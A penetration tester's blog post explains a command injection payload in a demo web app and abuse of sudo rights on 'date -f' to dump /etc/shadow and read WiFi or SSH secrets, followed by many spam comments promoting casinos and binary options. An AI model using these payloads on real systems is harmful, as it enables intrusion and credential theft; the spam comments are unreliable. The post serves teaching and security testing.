Recently, I was testing an open source web application and stumbled on a command injection as the www-data user (hopefully another blog post soon, once the vulnerability has been patched). To have a better idea of what I'm talking about, I created a demo web application with a similar vulnerability.
The payload in vulnparam is "id) && (echo" where id is the command output displayed to the screen and the echo part was to essentially eliminate the rest of the command that the web application intended to run but the actual command injection is outside the scope of this post. Injecting id confirms I'm running as www-data. While enumerating the system for privilege escalation I decided to run "sudo -l" to list the commands www-data was allowed to sudo and discovered something interesting.
Date seemed like something worth exploring. The man pages instantly revealed something promising.
What happens if I set the file parameter to something that doesn't contain dates? Well, nothing at first because the output goes to standard error, haha. But, once I realized that and directed standard error to standard output with the following payload "sudo date -f /etc/shadow 2>&1) && (echo", I hit pay dirt!
Since this was a web application on an Internet of Things (IoT) device, reading /etc/wpa_supplicant/wpa_supplicant.conf for the cleartext WiFi password would be beneficial. If you had root privileges on date on a more traditional engagement, you could use it for acquiring hashes or to read SSH private keys.
I thought this was an interesting step towards privilege escalation and worth sharing. At the very least, it might be useful for a CTF...
Go forth and reign shells!
Good to know! I'll add this to the list!
ReplyDeleteThe website is looking bit flashy and it catches the visitors eyes. Design is pretty simple and a good user friendly interface. recover lost bitcoins
ReplyDeleteThank you for some other informative website. The place else may just I get that kind of information written in such a perfect method? I have a venture that I am simply now running on, and I’ve been at the glance out for such info. instagram likes gradual
ReplyDeleteI’m going to read this. I’ll be sure to come back. thanks for sharing. and also This article gives the light in which we can observe the reality. this is very nice one and gives indepth information. thanks for this nice article... Best Forex Signal Service
ReplyDeleteI’m going to read this. I’ll be sure to come back. thanks for sharing. and also This article gives the light in which we can observe the reality. this is very nice one and gives indepth information. thanks for this nice article... pocket Option Forex
ReplyDeleteI recently found many useful information in your website especially this blog page. Among the lots of comments on your articles. Thanks for sharing. Social Trading with Binary options
ReplyDeleteI know your expertise on this. I must say we should have an online discussion on this. Writing only comments will close the discussion straight away! And will restrict the benefits from this information. Best Binary Options Strategy Download
ReplyDeleteI found your this post while searching for some related information on blog search...Its a good post..keep posting and update the information. Quotex Binary Options Broker
ReplyDeleteUseful information ..I am very happy to read this article. .thanks for giving us this useful information. Fantastic walk-through. I appreciate this post. Ea builder discount
ReplyDeleteBlogs on technology helps you stay updated in terms of the latest technology news, launch of gadgets, and many more. Subscribe to technology blogs and use information for your personal or professional use. http://access-control-singapore.jigsy.com/
ReplyDeleteThanks for posting this info. I just want to let you know that I just check out your site and I find it very interesting and informative. I can't wait to read lots of your posts. access control system singapore
ReplyDeleteCasino Junket (2021) - DrmCD
ReplyDeleteFind and compare the 나주 출장안마 Casino 부천 출장마사지 Junket (2021) reviews and ratings to see it. The casino 목포 출장마사지 is owned by the same owners 포천 출장샵 as the casino's 속초 출장샵 other online
Casino no deposit bonus - DrmCD
ReplyDeleteFree No Deposit Bonus · Casino no deposit bonus code 공주 출장마사지 · 경상남도 출장마사지 Deposit 보령 출장안마 bonus code. · New Casino no deposit bonus · 진주 출장샵 Deposit casino bonus code. · Deposit bonus code. 창원 출장샵
You may even find that lots of our scratch cards offer a little bit extra within the form of bonus options. Not only do these give you the likelihood to extend your winnings, however they may even convey the themes to life in your display screen and provide you with an even more partaking experience. Shagbark Farm in Caledonia will host model new} festival called 우리카지노 Gather To Bloom July, money hyperlink slots app what's extra through the Egypt Distribution of the Dead certainly. Checking day-to-day is one of the best apply to follow, there lives any anthem to the Egypt our god Amen-ra. Each sport has extensive range|a variety} of betting choices, they get the original guess and the money they received.
ReplyDeleteIf you want to stay updated with the most recent MyBookie promo codes; positive to|make sure to|remember to} examine our site regularly! Our specialists keep tabs on each bonus provide, so you'll be able to|you presumably can} focus on to} enjoying in} your favourite casino video games and betting on sports. With that stated, {be sure to|make sure to|remember to} drop by any of our really helpful on-line gambling sites to attain one of the best casino bonuses and achieve access to nicely liked|the most popular} casino video games. Unfortunately, if you’re craving some live dealer table motion, you’ll need to go elsewhere. The casino additionally has different table video 우리카지노 games, such as Super 21, blackjack, and poker.
ReplyDelete